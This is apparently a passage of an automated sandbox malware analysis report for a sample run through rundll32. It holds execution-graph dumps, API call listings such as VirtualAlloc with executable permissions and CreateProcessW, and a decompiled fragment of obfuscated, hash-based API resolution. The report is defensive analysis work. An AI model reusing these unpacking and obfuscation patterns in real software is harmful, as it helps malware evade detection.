3384->3382 4446 599d95 4449 59a07d 4446->4449 4447 59d54c GetPEB 4447->4449 4448 594a6f GetPEB 4448->4449 4449->4447 4449->4448 4451 59a24d 4449->4451 4452 5a2982 GetPEB 4449->4452 4453 59502c GetPEB 4449->4453 4454 593c8e GetPEB 4449->4454 4455 5a14fc 4449->4455 4452->4449 4453->4449 4454->4449 4460 5a163c 4455->4460 4456 59f965 GetPEB 4456->4460 4457 59d54c GetPEB 4457->4460 4458 5a189f GetPEB 4458->4460 4459 5a170e 4459->4449 4460->4456 4460->4457 4460->4458 4460->4459 3840 5a2515 3844 5a2529 3840->3844 3841 5a2722 3844->3841 3849 5a6158 3844->3849 3861 5ab165 3844->3861 3871 59a323 3844->3871 3890 5acc7f 3844->3890 3900 591983 3844->3900 3913 5a34c3 3844->3913 3850 5a64a7 3849->3850 3852 5a6628 3850->3852 3853 593c8e GetPEB 3850->3853 3855 594a6f GetPEB 3850->3855 3856 595370 GetPEB 3850->3856 3857 5a6626 3850->3857 3858 599a4b GetPEB 3850->3858 3859 5a02e1 GetPEB 3850->3859 3860 59598b GetPEB 3850->3860 3921 5aa6d9 3850->3921 3854 59d3f5 GetPEB 3852->3854 3853->3850 3854->3857 3855->3850 3856->3850 3857->3844 3858->3850 3859->3850 3860->3850 3866 5ab4a0 3861->3866 3862 5ab624 3864 59d3f5 GetPEB 3862->3864 3863 594a6f GetPEB 3863->3866 3865 5ab610 3864->3865 3865->3844 3866->3862 3866->3863 3866->3865 3868 5985b2 GetPEB 3866->3868 3950 5a9e33 3866->3950 3954 5950f1 3866->3954 3962 5a0fbc 3866->3962 3868->3866 3987 59f6fa 3871->3987 3873 595370 GetPEB 3887 59aba3 3873->3887 3875 59af43 3875->3844 3876 59af45 3879 59d3f5 GetPEB 3876->3879 3878 5ab060 GetPEB 3878->3887 3879->3875 3880 59d3f5 GetPEB 3880->3887 3881 5a02e1 GetPEB 3881->3887 3882 5aa6d9 GetPEB 3882->3887 3883 594a6f GetPEB 3883->3887 3884 59e761 GetPEB 3884->3887 3886 59598b GetPEB 3886->3887 3887->3873 3887->3875 3887->3876 3887->3878 3887->3880 3887->3881 3887->3882 3887->3883 3887->3884 3887->3886 3888 593c8e GetPEB 3887->3888 3990 5a08cf 3887->3990 3997 5a189f 3887->3997 4001 5939e1 3887->4001 4005 594d48 3887->4005 3888->3887 3898 5acf95 3890->3898 3891 5ad120 3893 59d3f5 GetPEB 3891->3893 3892 5a9e33 GetPEB 3892->3898 3894 5ad10c 3893->3894 3894->3844 3895 594a6f GetPEB 3895->3898 3896 5985b2 GetPEB 3896->3898 3897 5950f1 GetPEB 3897->3898 3898->3891 3898->3892 3898->3894 3898->3895 3898->3896 3898->3897 3899 5a0fbc GetPEB 3898->3899 3899->3898 3901 59205f 3900->3901 3902 592335 3901->3902 3905 594a6f GetPEB 3901->3905 3907 592321 3901->3907 3908 5aa6d9 GetPEB 3901->3908 3911 59598b GetPEB 3901->3911 3912 59e761 GetPEB 3901->3912 4019 5a891e 3901->4019 4028 59e81f 3901->4028 4031 5a1372 3901->4031 4036 5928aa 3901->4036 3904 59d3f5 GetPEB 3902->3904 3904->3907 3905->3901 3907->3844 3908->3901 3911->3901 3912->3901 3916 5a35ca 3913->3916 3914 5aa6d9 GetPEB 3914->3916 3915 5a36a7 3915->3844 3916->3914 3916->3915 3917 59598b GetPEB 3916->3917 3918 5a36a9 3916->3918 3920 594a6f GetPEB 3916->3920 3917->3916 3919 59d3f5 GetPEB 3918->3919 3919->3915 3920->3916 3922 5aabdd 3921->3922 3923 5ab63c GetPEB 3922->3923 3924 595370 GetPEB 3922->3924 3926 5aadb3 3922->3926 3929 5aadb1 3922->3929 3931 5a02e1 GetPEB 3922->3931 3932 59d54c GetPEB 3922->3932 3933 59b340 GetPEB 3922->3933 3934 5a1ba5 3922->3934 3942 5a5f20 3922->3942 3946 5ab060 3922->3946 3923->3922 3924->3922 3927 59e761 GetPEB 3926->3927 3927->3929 3929->3850 3931->3922 3932->3922 3933->3922 3935 5a1bbc 3934->3935 3936 5996ca GetPEB 3935->3936 3937 5a1ca4 3936->3937 3938 59d4fe GetPEB 3937->3938 3939 5a1ce9 3938->3939 3940 5a8f9b GetPEB 3939->3940 3941 5a1d04 3940->3941 3941->3922 3943 5a5f44 3942->3943 3944 5968ec GetPEB 3943->3944 3945 5a5ff8 3944->3945 3945->3922 3947 5ab082 3946->3947 3948 5a36c4 GetPEB 3947->3948 3949 5ab0a4 3948->3949 3949->3922 3951 5a9e49 3950->3951 3967 590cb5 3951->3967 3955 59510e 3954->3955 3960 59534a 3955->3960 3971 5a1f7b 3955->3971 3959 595305 3959->3960 3961 5958e8 GetPEB 3959->3961 3960->3866 3961->3959 3965 5a0fd0 3962->3965 3963 5a1102 3963->3866 3964 59e5c0 GetPEB 3964->3965 3965->3963 3965->3964 3983 5a453a 3965->3983 3968 590ccf 3967->3968 3969 5968ec GetPEB 3968->3969 3970 590d69 3969->3970 3970->3866 3972 5a1f9c 3971->3972 3973 5968ec GetPEB 3972->3973 3974 5952e6 3973->3974 3974->3960 3975 5958e8 3974->3975 3976 595901 3975->3976 3979 5ad6e1 3976->3979 3980 5ad6fe 3979->3980 3981 5968ec GetPEB 3980->3981 3982 595983 3981->3982 3982->3959 3984 5a4553 3983->3984 3985 5968ec GetPEB 3984->3985 3986 5a45d6 3985->3986 3986->3965 3988 5968ec GetPEB 3987->3988 3989 59f787 3988->3989 3989->3887 3992 5a08e9 3990->3992 3991 5a0b5a 3994 5937f6 GetPEB 3991->3994 3992->3991 3993 5a0b58 3992->3993 3995 594a6f GetPEB 3992->3995 4011 5937f6 3992->4011 3993->3887 3994->3993 3995->3992 3998 5a18b2 3997->3998 3999 5968ec GetPEB 3998->3999 4000 5a1928 3999->4000 4000->3887 4002 593a17 4001->4002 4003 5968ec GetPEB 4002->4003 4004 593ad0 4003->4004 4004->3887 4009 594d77 4005->4009 4006 594f7f 4006->3887 4007 594a6f GetPEB 4007->4009 4008 594f65 4015 59b046 4008->4015 4009->4006 4009->4007 4009->4008 4012 59381b 4011->4012 4013 5968ec GetPEB 4012->4013 4014 5938a6 4013->4014 4014->3992 4016 59b060 4015->4016 4017 5958e8 GetPEB 4016->4017 4018 59b0fb 4017->4018 4018->4006 4026 5a895f 4019->4026 4022 5a8e18 4022->3901 4023 594cc9 GetPEB 4023->4026 4024 595370 GetPEB 4024->4026 4026->4022 4026->4023 4026->4024 4027 5a02e1 GetPEB 4026->4027 4044 59fada 4026->4044 4048 5ab0ac 4026->4048 4052 5a45e3 4026->4052 4027->4026 4029 5968ec GetPEB 4028->4029 4030 59e8d4 4029->4030 4030->3901 4032 5a0f0d GetPEB 4031->4032 4033 5a142e 4032->4033 4056 5a600e 4033->4056 4037 5928cb 4036->4037 4038 59e81f GetPEB 4037->4038 4040 592b4a 4037->4040 4042 592b48 4037->4042 4060 592dc4 4037->4060 4064 5a1dec 4037->4064 4038->4037 4041 59e761 GetPEB 4040->4041 4041->4042 4042->3901 4045 59fb1b 4044->4045 4046 5968ec GetPEB 4045->4046 4047 59fbc5 4046->4047 4047->4026 4049 5ab0ca 4048->4049 4050 5968ec GetPEB 4049->4050 4051 5ab155 4050->4051 4051->4026 4053 5a45f3 4052->4053 4054 5968ec GetPEB 4053->4054 4055 5a4693 4054->4055 4055->4026 4057 5a6027 4056->4057 4058 5968ec GetPEB 4057->4058 4059 5a1444 4058->4059 4059->3901 4061 592df4 4060->4061 4062 5968ec GetPEB 4061->4062 4063 592e94 4062->4063 4063->4037 4065 5a1e09 4064->4065 4066 5968ec GetPEB 4065->4066 4067 5a1ea4 4066->4067 4067->4037 4461 59498c 4462 5949aa 4461->4462 4463 594a6f GetPEB 4462->4463 4465 594a3c 4463->4465 4464 594a64 4465->4464 4466 59d3f5 GetPEB 4465->4466 4466->4464 4068 5ab706 4069 5ab80b 4068->4069 4070 5ab85e 4069->4070 4076 5a41ab 4069->4076 4075 5a02e1 GetPEB 4075->4070 4081 5a41c4 4076->4081 4078 5a4411 4096 5ac4a5 4078->4096 4080 5a4427 4100 599c3d 4080->4100 4081->4078 4082 5a440f 4081->4082 4092 5a17e1 4081->4092 4088 5a9eda 4082->4088 4087 5a02e1 GetPEB 4087->4082 4089 5a9efa 4088->4089 4090 594a6f GetPEB 4089->4090 4091 5a9f94 4090->4091 4091->4075 4093 5a17fa 4092->4093 4094 5968ec GetPEB 4093->4094 4095 5a1891 4094->4095 4095->4081 4097 5ac4bb 4096->4097 4098 594a6f GetPEB 4097->4098 4099 5ac537 4098->4099 4099->4080 4099->4099 4109 59bea5 4100->4109 4102 599d8a 4105 5a8e80 4102->4105 4106 5a8e9f 4105->4106 4107 5a36c4 GetPEB 4106->4107 4108 5a4452 4107->4108 4108->4087 4110 59bec4 4109->4110 4111 5968ec GetPEB 4110->4111 4112 599d3a 4111->4112 4112->4102 4113 5ad623 4112->4113 4114 5ad64a 4113->4114 4115 5968ec GetPEB 4114->4115 4116 5ad6cb 4115->4116 4116->4102 4117 594304 4121 59476b 4117->4121 4118 5a3805 GetPEB 4118->4121 4119 594964 4120 595370 GetPEB 4120->4121 4121->4118 4121->4119 4121->4120 4122 5ab63c GetPEB 4121->4122 4123 599a4b GetPEB 4121->4123 4124 594966 4121->4124 4127 5a02e1 GetPEB 4121->4127 4128 5a373e 4121->4128 4122->4121 4123->4121 4125 59e761 GetPEB 4124->4125 4125->4119 4127->4121 4129 5a375e 4128->4129 4130 5968ec GetPEB 4129->4130 4131 5a37f3 4130->4131 4131->4121 4467 59db86 4472 59de20 4467->4472 4468 59d4fe GetPEB 4468->4472 4469 5996ca GetPEB 4469->4472 4470 59df2e 4471 5a8f9b GetPEB 4471->4472 4472->4468 4472->4469 4472->4470 4472->4471 4473 59b6b9 4478 59b85f 4473->4478 4474 59b8cd 4475 59d3f5 GetPEB 4475->4478 4476 5abba5 GetPEB 4476->4478 4477 5a9e33 GetPEB 4477->4478 4478->4474 4478->4475 4478->4476 4478->4477 4479 59e761 GetPEB 4478->4479 4479->4478 4480 593db8 4481 5a0f0d GetPEB 4480->4481 4490 594196 4481->4490 4482 5942d3 4484 5ac15b GetPEB 4482->4484 4483 5942d1 4484->4483 4485 595370 GetPEB 4485->4490 4486 5996ca GetPEB 4486->4490 4487 599a4b GetPEB 4487->4490 4488 5ab060 GetPEB 4488->4490 4489 5a02e1 GetPEB 4489->4490 4490->4482 4490->4483 4490->4485 4490->4486 4490->4487 4490->4488 4490->4489 4491 59d5b8 4496 59d85a 4491->4496 4493 59d9e5 4495 5a11d8 GetPEB 4493->4495 4494 59d3f5 GetPEB 4494->4496 4497 59d9e3 4495->4497 4496->4493 4496->4494 4496->4497 4500 5a0339 GetPEB 4496->4500 4501 5a0604 4496->4501 4508 5a1719 4496->4508 4512 596a1b 4496->4512 4500->4496 4505 5a061d 4501->4505 4502 5991b4 GetPEB 4502->4505 4503 594a6f GetPEB 4503->4505 4504 5a0829 4516 5991b4 4504->4516 4505->4502 4505->4503 4505->4504 4506 5a084e 4505->4506 4506->4496 4509 5a1735 4508->4509 4510 5968ec GetPEB 4509->4510 4511 5a17cf 4510->4511 4511->4496 4513 596a34 4512->4513 4514 5968ec GetPEB 4513->4514 4515 596ad6 4514->4515 4515->4496 4517 5991e2 4516->4517 4518 5968ec GetPEB 4517->4518 4519 59928a 4518->4519 4519->4506 4520 5a90be 4521 5a0f0d GetPEB 4520->4521 4522 5a9275 4521->4522 4523 594a6f GetPEB 4522->4523 4526 5a9319 4522->4526 4524 5a92f8 4523->4524 4525 59f965 GetPEB 4524->4525 4524->4526 4525->4526 4527 5a34bf 4530 5a35ca 4527->4530 4528 5aa6d9 GetPEB 4528->4530 4529 5a36a7 4530->4528 4530->4529 4531 59598b GetPEB 4530->4531 4532 5a36a9 4530->4532 4534 594a6f GetPEB 4530->4534 4531->4530 4533 59d3f5 GetPEB 4532->4533 4533->4529 4534->4530 4535 5938be 4536 5abba5 GetPEB 4535->4536 4537 59394c 4536->4537 4132 5a7132 4147 5a7195 4132->4147 4134 597405 GetPEB 4134->4147 4135 5a7f7f 4194 597405 4135->4194 4139 594a6f GetPEB 4139->4147 4141 5a7f99 4142 595370 GetPEB 4142->4147 4146 5a02e1 GetPEB 4146->4147 4147->4134 4147->4135 4147->4139 4147->4141 4147->4142 4147->4146 4148 59d3f5 GetPEB 4147->4148 4151 5a1933 4147->4151 4155 5995e8 4147->4155 4159 5ab869 4147->4159 4162 5a7065 4147->4162 4166 5992a3 4147->4166 4175 596737 4147->4175 4179 59e272 4147->4179 4186 5a3c35 4147->4186 4190 59edc7 4147->4190 4148->4147 4152 5a195c 4151->4152 4153 5968ec GetPEB 4152->4153 4154 5a19ed 4153->4154 4154->4147 4156 599607 4155->4156 4157 5968ec GetPEB 4156->4157 4158 5996a5 4157->4158 4158->4147 4198 593aeb 4159->4198 4163 5a7093 4162->4163 4164 5968ec GetPEB 4163->4164 4165 5a7119 4164->4165 4165->4147 4172 5994b4 4166->4172 4168 5995b5 4169 5995cc 4168->4169 4170 59d3f5 GetPEB 4168->4170 4169->4147 4170->4169 4171 594a6f GetPEB 4171->4172 4172->4168 4172->4171 4173 5958e8 GetPEB 4172->4173 4174 59d3f5 GetPEB 4172->4174 4202 5a2a4e 4172->4202 4173->4172 4174->4172 4176 596754 4175->4176 4177 5968ec GetPEB 4176->4177 4178 596807 4177->4178 4178->4147 4181 59e28f 4179->4181 4180 59e4bd 4183 59e67c GetPEB 4180->4183 4181->4180 4182 59e4bb 4181->4182 4184 594a6f GetPEB 4181->4184 4206 59e67c 4181->4206 4182->4147 4183->4182 4184->4181 4187 5a3c5f 4186->4187 4188 5968ec GetPEB 4187->4188 4189 5a3d14 4188->4189 4189->4147 4191 59ede9 4190->4191 4192 5968ec GetPEB 4191->4192 4193 59ee75 4192->4193 4193->4147 4195 597418 4194->4195 4196 5968ec GetPEB 4195->4196 4197 5974b4 4196->4197 4197->4141 4199 593b14 4198->4199 4200 5968ec GetPEB 4199->4200 4201 593ba6 4200->4201 4201->4147 4203 5a2a6d 4202->4203 4204 5968ec GetPEB 4203->4204 4205 5a2ae7 4204->4205 4205->4172 4207 59e6a8 4206->4207 4208 5968ec GetPEB 4207->4208 4209 59e747 4208->4209 4209->4181 4210 5a9333 4213 5a949b 4210->4213 4211 59b340 GetPEB 4211->4213 4213->4211 4214 5a9569 4213->4214 4216 5a0241 4213->4216 4219 599a99 4213->4219 4217 592353 GetPEB 4216->4217 4218 5a02d8 4217->4218 4218->4213 4220 599ab9 4219->4220 4227 5a28cc 4220->4227 4223 599c32 4223->4213 4226 59e761 GetPEB 4226->4223 4228 5968ec GetPEB 4227->4228 4229 599bfe 4228->4229 4229->4223 4230 5a1111 4229->4230 4231 5a112c 4230->4231 4232 5968ec GetPEB 4231->4232 4233 599c1e 4232->4233 4233->4226 4234 5a0437 4235 5a044e 4234->4235 4236 5a0536 4235->4236 4237 594a6f GetPEB 4235->4237 4237->4235 4538 5970ad 4543 5970d5 4538->4543 4539 5973d6 4540 59b046 GetPEB 4539->4540 4541 5973d4 4540->4541 4542 594a6f GetPEB 4542->4543 4543->4539 4543->4541 4543->4542 4544 59d4fe GetPEB 4543->4544 4544->4543 4242 59ef2e 4249 59ef53 4242->4249 4245 594a6f GetPEB 4245->4249 4246 59f44c 4247 59f439 4247->4246 4250 59d3f5 GetPEB 4247->4250 4249->4245 4249->4246 4249->4247 4252 5958e8 GetPEB 4249->4252 4253 594b2a 4249->4253 4257 5a0558 4249->4257 4260 593bbc 4249->4260 4264 596818 4249->4264 4250->4246 4252->4249 4254 594b53 4253->4254 4255 5968ec GetPEB 4254->4255 4256 594bf3 4255->4256 4256->4249 4258 5968ec GetPEB 4257->4258 4259 5a05f8 4258->4259 4259->4249 4261 593be2 4260->4261 4262 5968ec GetPEB 4261->4262 4263 593c76 4262->4263 4263->4249 4265 596838 4264->4265 4266 5968ec GetPEB 4265->4266 4267 5968da 4266->4267 4267->4249 4268 59f52e 4269 59b340 GetPEB 4268->4269 4270 59f69d 4269->4270 4271 5974bf GetPEB 4270->4271 4272 59f6b4 4271->4272 4276 59f6ed 4272->4276 4277 592b70 4272->4277 4275 59e092 GetPEB 4275->4276 4278 592b90 4277->4278 4279 595370 GetPEB 4278->4279 4280 592cde 4279->4280 4281 599a4b GetPEB 4280->4281 4282 592cfc 4281->4282 4283 5a02e1 GetPEB 4282->4283 4284 592d0e 4283->4284 4284->4275 4285 593523 4287 59363f 4285->4287 4289 593677 4287->4289 4290 59af66 4287->4290 4294 5a1d13 4287->4294 4291 59af7c 4290->4291 4292 5968ec GetPEB 4291->4292 4293 59b00b 4292->4293 4293->4287 4295 5a1d29 4294->4295 4296 5968ec GetPEB 4295->4296 4297 5a1de0 4296->4297 4297->4287 4545 5ac5a1 4546 5ac913 4545->4546 4547 59598b GetPEB 4546->4547 4548 593c8e GetPEB 4546->4548 4549 5aca48 4546->4549 4550 595370 GetPEB 4546->4550 4551 5aca55 GetPEB 4546->4551 4552 598e39 GetPEB 4546->4552 4553 5a02e1 GetPEB 4546->4553 4547->4546 4548->4546 4550->4546 4551->4546 4552->4546 4553->4546 4554 5a7fa7 4555 5996ca GetPEB 4554->4555 4556 5a811d 4555->4556 4557 5996ca GetPEB 4556->4557 4558 5a812a 4557->4558 4559 5996ca GetPEB 4558->4559 4560 5a8141 4559->4560 4563 59fdef 4560->4563 4564 59fe2b 4563->4564 4564->4564 4565 59ff22 4564->4565 4566 59eadd GetPEB 4564->4566 4566->4564

                                                                      Executed Functions

                                                                      Function 005AEB40, Relevance: 3.3, APIs: 2, Instructions: 252memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 005AEB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 005AEDD9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2094912701.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_590000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: 0b9d4f271a1f1bda07fb22ad80eaf09bfff76d1b03a3bdf39baf470ffb6350d6
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: F0C1A9B5A00209DFCB48CF88C591EAEBBB5BF88314F148159E909AB355D735EE42CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 005AE620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 41 5ae620-5ae66b call 5aea10 44 5ae67a-5ae6aa call 5ae390 VirtualAlloc 41->44 45 5ae66d-5ae677 call 5aea10 41->45 45->44
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 005AE6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2094912701.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_590000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: 6e490d7f766e37e96030d19bd435a198ec520fe2d0bc729b235bdb8bbeb556a1
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 4E114260D082C9DEEF01D7E8980A7FFBFB56F11704F044098D5446B282D2BA57588BB6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: rundll32.exe PID: 2468 Parent PID: 2836 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:1.7%
                                                                      Dynamic/Decrypted Code Coverage:15.1%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:73
                                                                      Total number of Limit Nodes:5

                                                                      Graph

                                                                      execution_graph 31077 1bf090 31078 1bf0b5 31077->31078 31083 1be620 31078->31083 31080 1bf1bf 31086 1beb40 VirtualProtect 31080->31086 31082 1bf1f8 31084 1be661 31083->31084 31085 1be694 VirtualAlloc 31084->31085 31085->31080 31088 1beb95 31086->31088 31087 1bede6 31087->31082 31088->31087 31089 1bedb8 VirtualProtect 31088->31089 31089->31088 31090 463928 31091 463972 31090->31091 31092 4639bd GetEnhMetaFileA 31091->31092 31093 4639cc VirtualAlloc 31092->31093 31095 463acf 31093->31095 31096 461638 31097 461643 DdeInitializeA 31096->31097 31099 461695 31097->31099 31102 461a14 31099->31102 31107 461ac8 31102->31107 31106 4616d6 31108 461ad2 31107->31108 31109 461a34 DdeCreateStringHandleA DdeNameService 31107->31109 31110 461ae0 DdeFreeStringHandle 31108->31110 31109->31106 31110->31109 31111 4099ef 31112 409a92 31111->31112 31113 409ab9 31111->31113 31117 41a0f1 31112->31117 31123 41a681 31117->31123 31121 41a883 31141 406417 31121->31141 31123->31121 31126 405dfc GetPEB 31123->31126 31127 409aa5 31123->31127 31128 410d6d GetPEB 31123->31128 31133 407f4b 31123->31133 31137 40471a 31123->31137 31151 410dc5 GetPEB 31123->31151 31152 405755 31123->31152 31156 40dfd8 GetPEB 31123->31156 31157 40a4d7 GetPEB 31123->31157 31126->31123 31127->31113 31130 4104c7 31127->31130 31128->31123 31131 407378 GetPEB 31130->31131 31132 41055b ExitProcess 31131->31132 31132->31113 31134 407f64 31133->31134 31158 407378 31134->31158 31138 404740 31137->31138 31139 407378 GetPEB 31138->31139 31140 4047d8 SHGetFolderPathW 31139->31140 31140->31123 31142 406445 31141->31142 31143 405755 GetPEB 31142->31143 31144 40668d 31143->31144 31166 41b86e 31144->31166 31146 4066c9 31150 4066d4 31146->31150 31170 40f1ed GetPEB 31146->31170 31148 4066f4 31171 40f1ed GetPEB 31148->31171 31150->31127 31151->31123 31153 40576d 31152->31153 31172 4109b8 31153->31172 31156->31123 31157->31123 31159 407464 31158->31159 31163 407490 lstrcmpiW 31158->31163 31164 410223 GetPEB 31159->31164 31161 40747a 31165 41c4dd GetPEB 31161->31165 31163->31123 31164->31161 31165->31163 31167 41b8aa 31166->31167 31168 407378 GetPEB 31167->31168 31169 41b92d CreateProcessW 31168->31169 31169->31146 31170->31148 31171->31150 31173 4109d1 31172->31173 31176 41e232 31173->31176 31177 41e24d 31176->31177 31178 407378 GetPEB 31177->31178 31179 4057cc 31178->31179 31179->31123

                                                                      Executed Functions

                                                                      Function 00463928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136filememoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 46 463928-4639b4 call 4479dc 51 4639b6 46->51 52 4639bd-4639cf GetEnhMetaFileA 46->52 51->52 54 4639d1 52->54 55 4639d8-4639ec 52->55 54->55 56 463a0e-463ac5 VirtualAlloc 55->56 57 4639ee-463a0c 55->57 65 463acf-463ada 56->65 57->56 66 463b21-463b33 65->66 67 463adc-463b1f 65->67 68 463b75-463bac 66->68 69 463b35-463b73 66->69 67->65 69->68 69->69
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 004639C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,00466CB4,00001000,00000040), ref: 00463A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345$|lF
                                                                      • API String ID: 2643768156-462011533
                                                                      • Opcode ID: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
                                                                      • Instruction ID: 00c49ef07d34f105fcf4d433495aa085861750dc82918067735be55c91b233ef
                                                                      • Opcode Fuzzy Hash: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
                                                                      • Instruction Fuzzy Hash: 8561B5B0601A409FE740DF69ED86A0537A5F704309B12853AE589972B1FFF5A854CF4F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004104C7, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 71 4104c7-410565 call 407378 ExitProcess
                                                                      C-Code - Quality: 100%
                                                                      			E004104C7() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t48;
				signed int _t49;

				_v8 = 0xb3b9;
				_v8 = _v8 + 0x1dd8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000002ef;
				_v20 = 0x5082;
				_t48 = 0xc;
				_v20 = _v20 / _t48;
				_v20 = _v20 ^ 0x00006c35;
				_v12 = 0x710;
				_v12 = _v12 >> 3;
				_t49 = 0x6d;
				_v12 = _v12 / _t49;
				_v12 = _v12 ^ 0x0000532a;
				_v16 = 0x5a4c;
				_v16 = _v16 ^ 0xca4a1f4d;
				_v16 = _v16 ^ 0xca4a24cd;
				E00407378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
				ExitProcess(0);
			}









                                                                      0x004104cd
                                                                      0x004104d6
                                                                      0x004104dd
                                                                      0x004104e1
                                                                      0x004104e5
                                                                      0x004104ec
                                                                      0x004104f8
                                                                      0x004104fd
                                                                      0x00410502
                                                                      0x00410509
                                                                      0x00410510
                                                                      0x00410517
                                                                      0x0041051f
                                                                      0x00410522
                                                                      0x00410529
                                                                      0x00410530
                                                                      0x00410537
                                                                      0x00410556
                                                                      0x00410560

                                                                      APIs
                                                                      • ExitProcess.KERNEL32(00000000), ref: 00410560
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095835293.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2095863133.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000B.00000002.2095877728.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID: *S$5l$LZ
                                                                      • API String ID: 621844428-1939029103
                                                                      • Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction ID: 8a4a50fccc019cea45a05ef1885fd17a53ef087f713c54163174b183f339ab60
                                                                      • Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction Fuzzy Hash: 2311F771E0520CEBEB04DFE5D84AA9EBBB1EB50714F10C189E414A7284D7F96B54CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00461638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 74 461638-461641 75 461643 74->75 76 46164b-4616d1 DdeInitializeA call 461328 call 461a14 74->76 75->76 86 4616d6-4616eb 76->86
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 00461686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      • Opcode ID: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
                                                                      • Instruction ID: d0869bd9eca08793bd1e582bf0eae279adb1ed532342e6143eed6f974ddeb4d0
                                                                      • Opcode Fuzzy Hash: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
                                                                      • Instruction Fuzzy Hash: F21194706007006FD710EF76CD82B4E77E9AF45744B54583AF800E76A1FA79A901875E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001BEB40, Relevance: 3.3, APIs: 2, Instructions: 252memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
